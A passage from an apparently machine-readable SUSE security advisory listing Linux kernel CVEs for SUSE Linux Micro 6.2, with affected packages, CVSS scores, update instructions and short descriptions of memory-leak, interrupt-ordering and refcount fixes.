"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71149",
"url": "https://www.suse.com/security/cve/CVE-2025-71149"
},
{
"category": "external",
"summary": "SUSE Bug 1257164 for CVE-2025-71149",
"url": "https://bugzilla.suse.com/1257164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71149"
},
{
"cve": "CVE-2025-71154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71154"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: rtl8150: fix memory leak on usb_submit_urb() failure\n\nIn async_set_registers(), when usb_submit_urb() fails, the allocated\n async_req structure and URB are not freed, causing a memory leak.\n\n The completion callback async_set_reg_cb() is responsible for freeing\n these allocations, but it is only called after the URB is successfully\n submitted and completes (successfully or with error). If submission\n fails, the callback never runs and the memory is leaked.\n\n Fix this by freeing both the URB and the request structure in the error\n path when usb_submit_urb() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71154",
"url": "https://www.suse.com/security/cve/CVE-2025-71154"
},
{
"category": "external",
"summary": "SUSE Bug 1257163 for CVE-2025-71154",
"url": "https://bugzilla.suse.com/1257163"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71154"
},
{
"cve": "CVE-2025-71156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71156"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngve: defer interrupt enabling until NAPI registration\n\nCurrently, interrupts are automatically enabled immediately upon\nrequest. This allows interrupt to fire before the associated NAPI\ncontext is fully initialized and cause failures like below:\n\n[ 0.946369] Call Trace:\n[ 0.946369] \u003cIRQ\u003e\n[ 0.946369] __napi_poll+0x2a/0x1e0\n[ 0.946369] net_rx_action+0x2f9/0x3f0\n[ 0.946369] handle_softirqs+0xd6/0x2c0\n[ 0.946369] ? handle_edge_irq+0xc1/0x1b0\n[ 0.946369] __irq_exit_rcu+0xc3/0xe0\n[ 0.946369] common_interrupt+0x81/0xa0\n[ 0.946369] \u003c/IRQ\u003e\n[ 0.946369] \u003cTASK\u003e\n[ 0.946369] asm_common_interrupt+0x22/0x40\n[ 0.946369] RIP: 0010:pv_native_safe_halt+0xb/0x10\n\nUse the `IRQF_NO_AUTOEN` flag when requesting interrupts to prevent auto\nenablement and explicitly enable the interrupt in NAPI initialization\npath (and disable it during NAPI teardown).\n\nThis ensures that interrupt lifecycle is strictly coupled with\nreadiness of NAPI context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71156",
"url": "https://www.suse.com/security/cve/CVE-2025-71156"
},
{
"category": "external",
"summary": "SUSE Bug 1257167 for CVE-2025-71156",
"url": "https://bugzilla.suse.com/1257167"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71156"
},
{
"cve": "CVE-2025-71157",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71157"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: always drop device refcount in ib_del_sub_device_and_put()\n\nSince nldev_deldev() (introduced by commit 060c642b2ab8 (\"RDMA/nldev: Add\nsupport to add/delete a sub IB device through netlink\") grabs a reference\nusing ib_device_get_by_index() before calling ib_del_sub_device_and_put(),\nwe need to drop that reference before returning -EOPNOTSUPP error.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71157",
"url": "https://www.suse.com/security/cve/CVE-2025-71157"
},
{
"category": "external",
"summary": "SUSE Bug 1257168 for CVE-2025-71157",
"url": "https://bugzilla.suse.com/1257168"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
